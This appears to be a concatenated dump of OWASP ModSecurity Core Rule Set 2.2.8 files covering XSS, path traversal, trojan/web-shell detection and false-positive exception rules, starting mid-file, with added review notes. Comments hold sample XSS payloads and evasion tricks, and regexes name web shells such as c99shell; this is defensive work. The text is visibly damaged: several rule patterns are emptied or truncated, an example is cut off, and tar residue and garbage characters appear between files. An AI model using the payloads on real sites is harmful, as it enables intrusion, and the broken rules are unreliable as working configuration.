"phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973307',capture,t:none,t:htmlEntityDecode,t:jsDecode,t:lowercase,block,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # -- CSS attack fragments -- # <div style="background-image: url(javascript:...)"> # <div style="background-image: url(javascript:alert('XSS'))"> // not used # <div style="width: expression(...);"> # <img style="x:expression(document.write(1))"> # <xss style="behavior: url(http://ha.ckers.org/xss.htc);"> # - <style>li {list-style-image: url("javascript:alert('XSS')");}</style><ul><li>xss # <style>@import url(...);</style> # -moz-binding:url(...) 
# background:url("javascript:...") # </xss/*-*/style=xss:e/**/xpression(alert(1337))> (comment evasion) // TODO Verify # <style type="text/css">@i\m\p\o\rt url(...);</style> (css escaping evasion) # <li style="behavior:url(hilite.htc)">xss # # Interesting CSS injection: http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/ # # Ref: http://crawlmsdn.microsoft.com/en-us/library/ms531078(vs.85).aspx (DHTML Behaviors) # # Note: A lot of these seem to need to use the "javascript:" prefix to execute anything. Requiring # a match of that before we do anything might help us reduce the FP rate. # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "background\b\W*?:\W*?url|background-image\b\W*?:|behavior\b\W*?:\W*?url|-moz-binding\b|@import\b|expression\b\W*?\(" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973308',capture,t:none,t:htmlEntityDecode,t:cssDecode,t:replaceComments,t:removeWhitespace,t:lowercase,block,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # <C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C> // evasion SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "<!\[cdata\[|\]\]>" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973309',capture,t:none,t:lowercase,block,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 
%{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # -- Misc -- # alert('xss') # alert("xss") # alert(/xss/) # <xss> # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "[/'\"<]xss[/'\">]" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973310',capture,t:none,t:lowercase,block,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # String.fromCharCode(88,83,83) # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(88,83,83)" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973311',capture,t:none,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:lowercase,block,msg:'XSS Attack Detected',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # '';!--"<XSS>=&{()} # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "'';!--\"<xss>=&{()}" \ 
"phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973312',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:none,t:lowercase,block,msg:'XSS Attack Detected',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # Handle &{alert('xss')} which is supposed to work in Netscape 4. # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "&{" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973313',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:none,block,msg:'XSS Attack Detected',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # <!DOCTYPE html [ # <!ENTITY inject "<script>alert(1)</script>"> # ]> # <html xmlns="http://www.w3.org/1999/xhtml"> # <head> # <title>Test # # # # &inject; # # # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* ")" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973331',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:none,t:htmlEntityDecode,t:compressWhiteSpace,block,msg:'IE XSS Filters - Attack 
Detected.',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:.*?((@[i\\\\])|(([:=]|(&#x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\\\]|(&#x?0*((40)|(28)|(92)|(5C));?)))))" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973315',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:none,t:htmlEntityDecode,t:compressWhiteSpace,block,msg:'IE XSS Filters - Attack Detected.',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:])" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973318',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:none,t:htmlEntityDecode,t:compressWhiteSpace,block,msg:'IE XSS Filters - Attack Detected.',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:)" 
"phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973329',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:none,t:htmlEntityDecode,t:compressWhiteSpace,block,msg:'IE XSS Filters - Attack Detected.',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:])" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973328',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:none,t:htmlEntityDecode,t:compressWhiteSpace,block,msg:'IE XSS Filters - Attack Detected.',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:[ /+\t\"\'`]style[ /+\t]*?=.*([:=]|(&#x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\\\]|(&#x?0*((40)|(28)|(92)|(5C));?)))" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973316',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:none,t:htmlEntityDecode,t:compressWhiteSpace,block,msg:'IE XSS Filters - Attack 
Detected.',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:[ /+\t\"\'`]on\[a-z]\[a-z]\[a-z]+?[ +\t]*?=.)" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973325',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:none,t:htmlEntityDecode,t:compressWhiteSpace,block,msg:'IE XSS Filters - Attack Detected.',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:[ /+\t\"\'`]datasrc[ +\t]*?=.)" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973319',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:none,t:htmlEntityDecode,t:compressWhiteSpace,block,msg:'IE XSS Filters - Attack Detected.',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" 
SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_42_tight_security.conf000066400000000000000000000034031216457256400323700ustar00rootroot00000000000000# ---------------------------------------------------------------
# Core ModSecurity Rule Set ver.2.2.8
# Copyright (C) 2006-2012 Trustwave All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENCE file for full details.
# ---------------------------------------------------------------

#
# This ruleset file contains rules that are highly prone to FPs
# Enable PARANOID_MODE in the 10 config file if you want to activate this rule
#
# NOTE(review): the rule below carries no PARANOID_MODE condition, and the
# CHANGES entry for 2.2.6 lists "Removed all PARANOID rule checks". As
# written, the rule appears to be active whenever this file is included -
# confirm, and expect false positives to be handled through exceptions.
#

#
# Directory Traversal
#
# Rule 950103 looks for: a path separator, then two dots, then another path
# separator. Each separator may be a literal backslash or slash or one of the
# listed percent/%u encodings; each dot may be literal or one of the listed
# encodings. Only t:none is applied, so the pattern is matched against the
# values as received and relies on the enumerated encodings instead of a
# decoding transformation.
#
# Inspected: REQUEST_URI, REQUEST_BODY, all request headers except Referer,
# and XML content. A match adds tx.critical_anomaly_score to
# tx.anomaly_score and stores the whole matched variable value in a per-rule
# TX variable.
#
SecRule REQUEST_URI|REQUEST_BODY|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer "(?i)(?:\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\.){2}(?:\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\/))" \
    "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'7',t:none,ctl:auditLogParts=+E,block,msg:'Path Traversal Attack',id:'950103',severity:'2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:none,capture,tag:'OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL-%{matched_var_name}=%{matched_var}'"

# Weaker signature
#
# NOTE(review): this commented-out variant reuses id 950103, the id of the
# active rule above. Give it a distinct id before enabling it alongside that
# rule. It also differs in phase (1), target (REQUEST_FILENAME only),
# transformation (t:urlDecodeUni) and in the TX variable name it sets (no
# OWASP_CRS/ prefix), so exceptions written against the rule above would not
# match it.
#SecRule REQUEST_FILENAME "\.\.[/\x5c]" "phase:1,rev:'2.2.8',t:none,t:urlDecodeUni,capture,ctl:auditLogParts=+E,block,msg:'Path Traversal Attack',id:'950103',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/DIR_TRAVERSAL-%{matched_var_name}=%{matched_var}'"
SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_45_trojans.conf000066400000000000000000000071141216457256400310100ustar00rootroot00000000000000# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # The trojan access detection rules detect access to known Trojans already # installed on a server. Uploading of Trojans is part of the Anti-Virus rules # and uses an external Anti-Virus program when uploading files. # # Detection of Trojan access is especially important in a hosting environment # where the actual Trojan upload may be done through valid methods and not # through hacking. # -- # # NOTE Trojan detection is based on checking elements controlled by the client. # A determined attacker can bypass those checks. We are working on # enchaining the checks so it would require a major change in the Trojan # to overcome. # # NOTE We found out that Trojan horses are not detected easily by Anti-Virus # software when uploading, as the signature set of AV software is not tuned # for this purpose. We are working on adding signatures tuned to detect # Trojan uploads to the file upload inspection. 
# SecRule REQUEST_HEADERS_NAMES "x_(?:key|file)\b" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,t:lowercase,ctl:auditLogParts=+E,block,msg:'Backdoor access',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',capture,id:'950110',tag:'OWASP_CRS/MALICIOUS_SOFTWARE/TROJAN',tag:'WASCTC/WASC-01',tag:'OWASP_TOP_10/A7',tag:'PCI/5.1.1',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.trojan_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/MALICIOUS_SOFTWARE/TROJAN-%{matched_var_name}=%{matched_var}" SecRule REQUEST_FILENAME "root\.exe" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E,block,msg:'Backdoor access',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',capture,id:'950921',tag:'OWASP_CRS/MALICIOUS_SOFTWARE/TROJAN',tag:'WASCTC/WASC-01',tag:'OWASP_TOP_10/A7',tag:'PCI/5.1.1',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.trojan_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/MALICIOUS_SOFTWARE/TROJAN-%{matched_var_name}=%{matched_var}" SecRule RESPONSE_BODY "(?:[^<]*?(?:\b(?:(?:c(?:ehennemden|gi-telnet)|gamma web shell)\b|imhabirligi phpftp)|(?:r(?:emote explorer|57shell)|aventis klasvayv|zehir)\b|\.::(?:news remote php shell injection::\.| rhtools\b)|ph(?:p(?:(?: commander|-terminal)\b|remoteview)|vayv)|myshell)|\b(?:(?:(?:microsoft windows\b.{0,10}?\bversion\b.{0,20}?\(c\) copyright 1985-.{0,10}?\bmicrosoft corp|ntdaddy v1\.9 - obzerve \| fux0r inc)\.|(?:www\.sanalteror\.org - indexer and read|haxplor)er|php(?:konsole| shell)|c99shell)\b|aventgrup\.<br>|drwxr))" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',t:none,ctl:auditLogParts=+E,block,msg:'Backdoor access',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 
%{MATCHED_VAR}',capture,id:'950922',tag:'OWASP_CRS/MALICIOUS_SOFTWARE/TROJAN',tag:'WASCTC/WASC-01',tag:'OWASP_TOP_10/A7',tag:'PCI/5.1.1',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.trojan_score=+1,setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/MALICIOUS_SOFTWARE/TROJAN-%{matched_var_name}=%{matched_var}" ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_47_common_exceptions.conf�������0000664�0000000�0000000�00000004307�12164572564�0033064�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # This file is used as an exception mechanism to remove common false positives # that may be encountered. 
#
# Exception for Apache SSL pinger
#
# Chain 981020 (pass, nolog) applies when:
#   1. the request line is exactly "GET /" (the pattern is anchored and
#      leaves no room for a protocol version), and
#   2. REMOTE_ADDR is 127.0.0.1 or ::1.
# For every TX variable whose name matches PROTOCOL_VIOLATION/MISSING_HEADER
# the chain increments tx.missing_header and stores that variable's name in
# tx.missing_header_<n>. The last rule then reads the TX variables whose name
# matches MISSING_HEADER_ (presumably the entries just stored), captures the
# text after "TX:" and unsets the TX variable of that name (setvar:!tx.).
#
# NOTE(review): this chain removes the recorded matches but does not change
# tx.anomaly_score, unlike chain 981022 below, which subtracts 5. Whether the
# missing-header rules have already added to the score is not visible in this
# file - confirm.
# NOTE(review): if a reverse proxy on the same host forwards client traffic,
# REMOTE_ADDR may be a loopback address for external requests as well; verify
# against the deployment before relying on this condition.
#
SecRule REQUEST_LINE "^GET /$" "chain,phase:2,id:'981020',t:none,pass,nolog"
    SecRule REMOTE_ADDR "^(127\.0\.0\.|\:\:)1$" "chain,t:none"
    SecRule TX:'/PROTOCOL_VIOLATION\\\/MISSING_HEADER/' ".*" "chain,setvar:tx.missing_header=+1,setvar:tx.missing_header_%{tx.missing_header}=%{matched_var_name}"
    SecRule TX:'/MISSING_HEADER_/' "TX\:(.*)" "capture,t:none,setvar:!tx.%{tx.1}"

#
# Exception for Apache internal dummy connection
#
# Chain 981021 (pass, nolog) has the same structure as 981020 with different
# conditions: the request line is "GET /" or "OPTIONS *" followed by
# " HTTP/1.0", REMOTE_ADDR is 127.0.0.1 or ::1, and the User-Agent ends with
# "(internal dummy connection)". The "." in "HTTP/1.0" is unescaped and so
# matches any single character. The repeated t:none on the User-Agent rule
# has no additional effect.
#
# The REMOTE_ADDR condition is the only one here that the client does not
# choose; the reverse-proxy caveat noted for 981020 applies to it too.
#
SecRule REQUEST_LINE "^(GET /|OPTIONS \*) HTTP/1.0$" "chain,phase:2,id:'981021',t:none,pass,nolog"
    SecRule REMOTE_ADDR "^(127\.0\.0\.|\:\:)1$" "chain,t:none"
    SecRule REQUEST_HEADERS:User-Agent "^.*\(internal dummy connection\)$" "t:none,t:none,chain"
    SecRule TX:'/PROTOCOL_VIOLATION\\\/MISSING_HEADER/' ".*" "chain,setvar:tx.missing_header=+1,setvar:tx.missing_header_%{tx.missing_header}=%{matched_var_name}"
    SecRule TX:'/MISSING_HEADER_/' "TX\:(.*)" "capture,t:none,setvar:!tx.%{tx.1}"

#
# Exception for Adobe Flash Player
# https://www.modsecurity.org/tracker/browse/CORERULES-57
#
# Chain 981022 (pass, nolog) applies to POST requests whose User-Agent
# contains "Adobe Flash Player", that carry an X-Flash-Version header, and
# whose Content-Type contains "application/x-amf". It removes the recorded
# missing-header matches in the same way as the chains above and, for each
# one removed, subtracts 5 from tx.anomaly_score.
#
# NOTE(review): every condition in this chain is a request attribute set by
# the client (method and three headers); there is no source-address check as
# in 981020/981021. The effect is limited to the missing-header matches, but
# consider restricting the exception to the paths that actually serve AMF.
# NOTE(review): the fixed "-5" assumes the missing-header rules added 5 per
# match; the scores they add are configured elsewhere - confirm they agree.
#
SecRule REQUEST_METHOD "@streq POST" "chain,phase:2,id:'981022',t:none,pass,nolog"
    SecRule REQUEST_HEADERS:User-Agent "@contains Adobe Flash Player" "chain,t:none"
    SecRule REQUEST_HEADERS:X-Flash-Version ".*" "chain,t:none"
    SecRule REQUEST_HEADERS:Content-Type "@contains application/x-amf" "chain,t:none"
    SecRule TX:'/PROTOCOL_VIOLATION\\\/MISSING_HEADER/' ".*" "chain,setvar:tx.missing_header=+1,setvar:tx.missing_header_%{tx.missing_header}=%{matched_var_name}"
    SecRule TX:'/MISSING_HEADER_/' "TX\:(.*)" "capture,t:none,setvar:!tx.%{tx.1},setvar:tx.anomaly_score=-5"
�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_48_local_exceptions.conf.example0000664�0000000�0000000�00000005343�12164572564�0034322�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.7 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # This file is used to allow custom checks and exclusions for the transactional # variable rules. Place rules in this file so that you may influence what happens # in the 49 - Enforcement File. # In previous ModSecurity rules, the TARGET list would have to be updated in # order to exclude a specific paramater like this - # # SecRule ARGS_NAMES|ARGS|!ARGS:foo # # With the new transactional variable rules, parameter exceptions can now # be handled AFTER the initial inspection as the rules now use setvars to # capture meta-data with each rule match. 
They use this syntax -
#
# setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}
#
# When the transactional rules trigger, they will set a TX variable similar to this
# for an SQL Injection attack -
#
# Set variable "tx.950001-WEB_ATTACK/SQL_INJECTION-ARGS:comments" to "1' or select * from users where username = admin ".
#
# With this data now available, the user can implement flexible exceptions.
#
# Exception example - exclude a parameter
#
# In this example, we are inspecting
# the TX collection to see if there is a current variable that has matched
# for the 950001 SQL Injection rule ID and for the "comments" parameter. If
# so, then we are going to remove that variable from the collection by using the
# setvar:!tx. syntax. By doing this, the TX variable is removed before final
# inspection at the end of phase 2 in the enforcement file.
#
# The examples also subtract a fixed value (20) from tx.anomaly_score. That value
# should equal what the removed match added to the score; otherwise the total no
# longer reflects the matches that remain. ModSecurity 2.7 and later require a
# unique id action on each rule (the first rule of a chain), so add one when
# uncommenting an example.
#
